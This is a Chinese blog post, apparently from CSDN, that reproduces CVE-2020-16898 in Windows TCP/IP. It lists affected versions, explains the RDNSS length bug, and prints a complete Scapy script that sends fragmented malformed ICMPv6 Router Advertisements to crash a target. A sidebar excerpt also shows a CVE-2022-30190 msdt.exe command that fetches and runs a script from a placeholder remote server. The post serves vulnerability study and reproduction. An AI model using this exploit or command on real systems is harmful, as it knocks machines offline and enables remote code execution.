CVE-2020-16898 Windows tcp/ip远程代码执行漏洞复现以及分析

最新推荐文章于 2024-05-01 11:32:10 发布
最新推荐文章于 2024-05-01 11:32:10 发布
阅读量909 收藏 2
点赞数
分类专栏: 漏洞 安全 环境复现 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39811856/article/details/109310519
版权
安全 同时被 3 个专栏收录
33 篇文章 2 订阅
订阅专栏
漏洞
26 篇文章 2 订阅
订阅专栏
环境复现
19 篇文章 0 订阅
订阅专栏

受影响版本

  • Windows 10 Version 1709 for 32-bit Systems
  • Windows 10 Version 1709 for ARM64-based Systems
  • Windows 10 Version 1709 for x64-based Systems
  • Windows 10 Version 1803 for 32-bit Systems
  • Windows 10 Version 1803 for ARM64-based Systems
  • Windows 10 Version 1803 for x64-based Systems
  • Windows 10 Version 1809 for 32-bit Systems
  • Windows 10 Version 1809 for ARM64-based Systems
  • Windows 10 Version 1809 for x64-based Systems
  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 2004 for 32-bit Systems
  • Windows 10 Version 2004 for ARM64-based Systems
  • Windows 10 Version 2004 for x64-based Systems
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)

 

 

1.环境搭建

攻击机环境:windows 10 (python版本:3.7)

 

受害机环境:windows10 1909

 

桥接模式下查看IPv6

 

2.1 漏洞背景

2020年10月14日,某监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告,该漏洞是由于Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞,远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包 ,并将其发送到远程Windows主机上,可造成远程BSOD,漏洞编号为CVE-2020-16898。

2.2 漏洞成因

根据rfc5006 描述,RDNSS包的length应为奇数,而当攻击者构造的RDNSS包的Length为偶数时,Windows TCP/IP 在检查包过程中会根据Length来获取每个包的偏移,遍历解析,导致对 Addresses of IPv6 Recursive DNS Servers 和下一个 RDNSS 选项的边界解析错误,从而绕过验证,将攻击者伪造的option包进行解析,造成栈溢出,从而导致系统崩溃。

2.3漏洞利用条件

只有当源地址是link-local IPv6 时,才可利用该 bug。这个要求限制了潜在的目标!

整个 payload 必须是一个合法的 IPv6 数据包。如果把标头搞砸了,那么在触发该 bug 前,数据包就会遭拒绝。

在验证数据包大小的过程中,Optional 标头的所有已定义 “length” 必须和数据包大小相匹配。

该漏洞可允许私运 (smuggle) 一个额外的“标头”。该标头未经验证且包含 “Length” 字段。触发该 bug 后,会检查该字段和数据包大小的匹配情况。

Windows NDIS API 可触发该 bug,从利用的角度看,它的优化非常麻烦。为了绕过优化,需要使用分段!否则,你虽然能触发该 bug,但不会引发内存损坏后果!

 

Payload:

 

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = "fe80::755a:cbf:f6b6:22e2"
v6_src = "fe80::4b2b:5cd2:f5a9:6d0e:8898"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

 

复现蓝屏截图:

 

 

在利用Payload时对其抓包;

目测红框下的Router Advertisement是最核心的包

 

 

想更仔细分析该漏洞的朋友,可查看这篇更专业的博客:https://blog.csdn.net/smellycat000/article/details/109172780

ATOM_123
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Windows tcp ip远程代码执行漏洞CVE-2020-16898)
weixin_47531489的博客
07-20 790
1 简介 CVE-2020-16898,又称“Bad Neighbor”。Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 2 漏洞概述 当 Windows TCP/IP 堆栈不正确地处理使用 Option Type
CVE-2020-16898: Windows操作系统 TCP-IP远程执行代码漏洞
weixin_38896449的博客
12-03 578
这里写目录标题1.漏洞描述2.影响版本3.漏洞排查4.漏洞利用5.漏洞 1.漏洞描述 10月,微软官方发布安全公告,修Windows操作系统内的TCP/IP远程代码执行漏洞CVE-2020-16898)。攻击者可通过发送特制的ICMPv6 Router Advertisement(路由通告)数据包至远程Windows主机,即可在目标主机上执行任意代码漏洞风险:严重 2.影响版本 Windows 10 version 1709/1803/1809/1903/1909/2004 Windows S
2024年最新网络安全学习day6——永恒之黑漏洞
最新发布
2401_84254418的博客
05-01 323
所需要的工具在文末可以获取。
ip分片代码_原创 | Ripple20:Treck TCP/IP协议栈漏洞分析与验证
weixin_39965514的博客
11-22 250
作者:启明星辰ADLab一、前言国外安全研究人员在由Treck开发的TCP/IP协议栈中发了多个漏洞,这一系列漏洞统称为Ripple20。这些漏洞广泛存在于嵌入式和物联网设备中,影响了多个行业领域(包括医疗、运输、能源、电信、工业控制、零售和商业等),涉及了众多供应商(包括HP、Schneider Electric、Intel、Rockwell Automation、Caterpill...
漏洞通告】微软Exchange远程代码执行漏洞CVE-2020-0688)通告
爱国小白帽
02-26 2747
漏洞通告】微软Exchange远程代码执行漏洞CVE-2020-0688)通告 原创 绿盟安全服务部 绿盟科技安全情报 今天 通告编号:NS-2020-0012 2020-02-26 TAG: 微软、Exchange、远程代码执行 危害等级: 高,攻击者利用此漏洞可实远程代码执行,从而控制Exchange服务器。 应急等级: 黄色 版本: 1.0 1 漏洞概述 北...
CVE-2020-16898漏洞
HengMengSec的博客
07-11 692
CVE-2020-16898,又称“Bad Neighbor”,在Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
ip分片代码_CVE202016898 “坏邻居”Windows TCP/IP 远程代码执行漏洞分析
weixin_39791225的博客
11-24 461
本文作者 Strawberry@ QAX A-TEAM2020年10月14日,微软修了一个紧急漏洞Windows TCP/IP 远程代码执行漏洞漏洞编号为 CVE-2020-16898。Windows TCP/IP 堆栈在处理 ICMPv6 路由器广告数据包时,存在一个远程执行代码漏洞。攻击者可通过向受影响主机发送特制 ICMPv6 路由广告包来利用此漏洞,成功利用此漏洞的攻击...
CVE-2020-16898 TCP/IP远程代码执行漏洞
向着太阳奔跑
11-11 465
简述 CVE-2020-16898,又称“Bad Neighbor” Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 漏洞描述 当 Windows TCP/IP 堆栈不正确地处理使用 Option Type 25(
openssl漏洞怎么处理_Windows暴露严重安全漏洞CVE-2020-0601,影响关键加密功能
weixin_39548606的博客
11-23 581
最近Window系统爆一个严重的安全漏洞,该漏洞使CryptoAPI无法正确验证椭圆曲线(ECC)密码证书,攻击者可以用该漏洞欺骗证书信任链。微软已经在昨天发布了一个重要软件更新,修漏洞。NSA同步也发布了安全升级公告,NSA评估该漏洞为严重漏洞漏洞被编码为CVE-2020-0601,影响所有Microsoft Windows版本加密功能。该漏洞将导致Windows证书验证的加密认证的证书信...
Nday--CVE-2020-16898(TCP/IP远程代码执行漏洞)
Vdieoo的博客
11-18 509
CVE-2020-16898 TCP/IP远程代码执行漏洞 https://github.com/XTaiQue/CVE-2020-16898--EXP-POC poc ,exp 完整学习:https://www.freebuf.com/articles/system/252263.html 以下我的过程:
漏洞 - CVE-2020-16898 微软TCP/IP远程执行代码漏洞
10-17 1985
前几天微软更新补丁中有个CVE-2020-16898,下面是摘抄的一段描述, Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 漏洞原理不是很懂,主要是记录下过程 一、环境 ①网络环境开启ipv6支持。这里使用v
Windows全版本本地提权(CVE-2020-0787)
Ms08067安全实验室
06-22 5428
文章来源:关注安全技术https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases一条命令从AP...
Windows远程代码执行漏洞(CVE-2020-16898) 高危漏洞加固指南
乐大厨串串香飘万里
10-17 1531
序号漏洞类型风险等级漏洞主机( 操作系统及版本)1Windows TCP/IP远程代码执行漏洞(CVE-2020-16898)高Windows 漏洞详细当Windows TCP / IP堆栈不正确地处理使用选项类型25(递归DNS服务器选项)且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程执行代码漏洞。在此选项中,长度以8个字节为增量进行计数,因此长度为3的RDNSS选项的总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务器的类型,长度,保留,生存时间和地址。前四个
专家发布了针对OpenSSL中CVE-2020-1967 DoS漏洞的PoC漏洞
qq_41679358的博客
05-05 510
OpenSSL中最近修CVE-2020-1967拒绝服务(DoS)问题的概念验证(PoC)漏洞已公开。最近,OpenSSL项目发布了针对OpenSSL的安全更新,该更新修补了一个高严重性漏洞(跟踪为CVE-2020-1967),攻击者可以利用该漏洞发起拒绝服务(DoS)攻击。CVE-2020-1967漏洞在SSL_check_chain函数中被描述为“分段错误”,这是2020年Ope...
cve-2022-30190 msdt远程代码执行漏洞
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值